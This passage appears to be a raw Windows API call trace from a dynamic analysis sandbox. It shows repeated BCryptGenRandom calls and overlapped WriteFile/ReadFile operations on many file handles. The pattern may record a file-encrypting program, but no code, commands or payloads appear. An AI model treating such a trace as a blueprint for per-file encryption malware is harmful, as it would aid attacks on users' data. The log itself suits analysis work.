lpOverlapped=0x2fafc18) returned 1 [0101.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.605] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.606] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.606] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.606] free (_Block=0x77d800) [0101.606] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.606] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.606] free (_Block=0x2071818) [0101.606] free (_Block=0x2071928) [0101.607] free (_Block=0x77d908) [0101.607] WriteFile (in: hFile=0x13e4, lpBuffer=0x3e3003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008) returned 1 [0101.607] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.617] WriteFile (in: hFile=0xca0, lpBuffer=0x3e700ac, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70078 | out: lpBuffer=0x3e700ac, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70078) returned 0x0 [0101.617] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.634] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.637] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.637] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.639] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.640] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.640] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.640] free (_Block=0x77d800) [0101.640] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.640] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.640] free (_Block=0x2071818) [0101.640] free (_Block=0x2071928) [0101.640] free (_Block=0x77d908) [0101.640] WriteFile (in: hFile=0xcb0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0101.641] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.653] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.655] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.655] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.657] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.657] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.657] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.657] free (_Block=0x77d800) [0101.658] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.658] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.658] free (_Block=0x2071818) [0101.658] free (_Block=0x2071928) [0101.658] free (_Block=0x77d908) [0101.658] WriteFile (in: hFile=0xcb4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.658] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.676] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.678] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.678] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.680] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.680] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.680] free (_Block=0x77d800) [0101.680] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.680] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.681] free (_Block=0x2071818) [0101.681] free (_Block=0x2071928) [0101.681] free (_Block=0x77d908) [0101.681] WriteFile (in: hFile=0xca0, lpBuffer=0x3e700ac*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70078 | out: lpBuffer=0x3e700ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70078) returned 1 [0101.681] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.682] CloseHandle (hObject=0xcb0) returned 1 [0101.684] free (_Block=0x3d70048) [0101.684] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.685] CloseHandle (hObject=0xcb4) returned 1 [0101.688] free (_Block=0x1ff1e60) [0101.688] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.689] CloseHandle (hObject=0xca0) returned 1 [0101.692] free (_Block=0x3e70078) [0101.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.842] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.846] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.846] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.846] free (_Block=0x77d800) [0101.846] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.846] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.846] free (_Block=0x2071818) [0101.846] free (_Block=0x2071928) [0101.846] free (_Block=0x77d908) [0101.846] WriteFile (in: hFile=0xcac, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.848] WriteFile (in: hFile=0xcac, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.891] ReadFile (in: hFile=0xcac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x1398, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0101.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.926] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.926] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.926] free (_Block=0x77d800) [0101.926] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.926] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.926] free (_Block=0x2071818) [0101.926] free (_Block=0x2071928) [0101.926] free (_Block=0x77d908) [0101.926] WriteFile (in: hFile=0xefc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.934] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.934] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.935] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.938] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.938] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.939] free (_Block=0x77d800) [0101.939] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.939] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.939] free (_Block=0x2071818) [0101.939] free (_Block=0x2071928) [0101.939] free (_Block=0x77d908) [0101.939] WriteFile (in: hFile=0xf00, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0101.939] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.039] CloseHandle (hObject=0xef8) returned 1 [0102.040] free (_Block=0x1ff1e60) [0102.040] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.041] WriteFile (in: hFile=0xf00, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0102.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.076] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2a50, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.077] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.077] CloseHandle (hObject=0xf00) returned 1 [0102.080] free (_Block=0x1ff1e60) [0102.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0102.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.127] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0102.127] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.128] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.128] free (_Block=0x3df0008) [0102.128] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.128] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.128] free (_Block=0x3df0008) [0102.128] free (_Block=0x2071818) [0102.128] free (_Block=0x77d800) [0102.128] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.136] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.136] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.185] CloseHandle (hObject=0xf00) returned 1 [0102.186] free (_Block=0x1ff1e60) [0102.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.258] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0102.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0102.260] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.260] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.260] free (_Block=0x3df0008) [0102.260] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.260] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.260] free (_Block=0x3df0008) [0102.260] free (_Block=0x2071818) [0102.260] free (_Block=0x77d800) [0102.260] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.262] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.262] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.273] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.273] CloseHandle (hObject=0xf00) returned 1 [0102.274] free (_Block=0x1ff1e60) [0102.274] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.283] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0102.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0102.284] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.284] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.284] free (_Block=0x3df0008) [0102.284] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.284] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.285] free (_Block=0x3df0008) [0102.285] free (_Block=0x2071818) [0102.285] free (_Block=0x77d800) [0102.285] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.285] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.286] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.286] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.300] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1f20, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.301] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.302] CloseHandle (hObject=0xf00) returned 1 [0102.304] free (_Block=0x1ff1e60) [0102.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0102.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0102.315] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.315] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.315] free (_Block=0x3df0008) [0102.315] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.315] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.316] free (_Block=0x3df0008) [0102.316] free (_Block=0x2071818) [0102.316] free (_Block=0x77d800) [0102.316] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.317] WriteFile (in: 